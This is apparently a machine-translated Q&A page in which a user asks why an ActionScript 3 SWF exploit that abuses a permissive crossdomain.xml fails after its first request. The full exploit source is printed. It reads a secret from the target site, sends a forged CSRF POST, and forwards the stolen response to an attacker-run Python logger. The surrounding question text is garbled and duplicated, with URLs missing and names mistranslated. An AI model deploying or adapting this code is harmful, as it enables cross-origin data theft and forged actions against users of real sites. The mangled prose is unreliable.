Actionscript 3 使用actionscript执行跨源请求时不一致
我正在使用从以下操作脚本生成的SWF从托管到的SWF进行跨源调用 在处有一个许可的crossdomain.xml,如下所示Actionscript 3 使用actionscript执行跨源请求时不一致,actionscript-3,cross-domain,crossdomain.xml,cross-domain-policy,Actionscript 3,Cross Domain,Crossdomain.xml,Cross Domain Policy,我正在使用从以下操作脚本生成的SWF从托管到的SWF进行跨源调用 在处有一个许可的crossdomain.xml,如下所示 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"> <cross-domain-policy> <allow-access-from
<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.victim.com" />
</cross-domain-policy>
,从中检索crossdomain.xml的第一步,在本地测试了这段代码。但是,没有进一步的请求
替换为
我找不到这种令人困惑的行为的潜在原因。我是一个actionscript noob。任何关于为什么会发生这种情况的指点都将不胜感激。只是一个粗略的猜测,还应该有自己的crossdomain.xml副本。我认为主域的许可不会自动允许对子域的请求。@organise something.subdomain.Victor.com:8000是漏洞的宿主。它是源代码。它有自己的跨域策略,不应该控制对Victor.com的请求,对吗?你说SWF是在托管的,也许我不清楚。最后一部分是关于我如何确保它不是代码错误。请阅读问题末尾的第1点到第1点。
// Adaptation of an exploit by John M as defined in
// https://medium.com/@x41x41x41/exploiting-crossdomain-xml-missconfigurations-3c8d407d05a8
// PHP serverside is replaced with a simpler python cgi. Thanks to trustedsec
package {
import flash.display.Sprite;
import flash.events.*;
import flash.net.URLRequestMethod;
import flash.net.URLRequest;
import flash.net.URLVariables;
import flash.net.URLLoader;
import flash.net.URLLoaderDataFormat;
public class crossDomain extends Sprite {
public function crossDomain() {
// Fetching secret.
var firstrequest:URLRequest = new URLRequest("https://victim.com/a?secret=test");
var firstloader:URLLoader = new URLLoader();
firstloader.addEventListener(Event.COMPLETE, completeHandler);
try {
firstloader.load(firstrequest);
} catch (error: Error) {
trace("Unable to load URL: " + error);
}
// Performing CSRF with a POST
var secondvariables:URLVariables = new URLVariables("a=test1&b=test2&c=test3&final=nothing");
var secondrequest:URLRequest = new URLRequest("http://victim.com/someaction.html");
secondrequest.method = URLRequestMethod.POST;
secondrequest.data = secondvariables;
var secondloader:URLLoader = new URLLoader();
secondloader.dataFormat = URLLoaderDataFormat.VARIABLES;
try {
secondloader.load(secondrequest);
} catch (error: Error) {
trace("Unable to load URL");
}
}
private function completeHandler(event: Event): void {
// Retreiving the HTTP responses to attacker server.
var request:URLRequest = new URLRequest("http://something.subdomain.victim.com:8000/cgi-bin/postlogger.py");
var variables:URLVariables = new URLVariables();
variables.data = event.target.data;
request.method = URLRequestMethod.POST;
request.data = variables;
var loader:URLLoader = new URLLoader();
try {
loader.load(request);
} catch (error: Error) {
trace("Unable to load URL");
}
}
}
}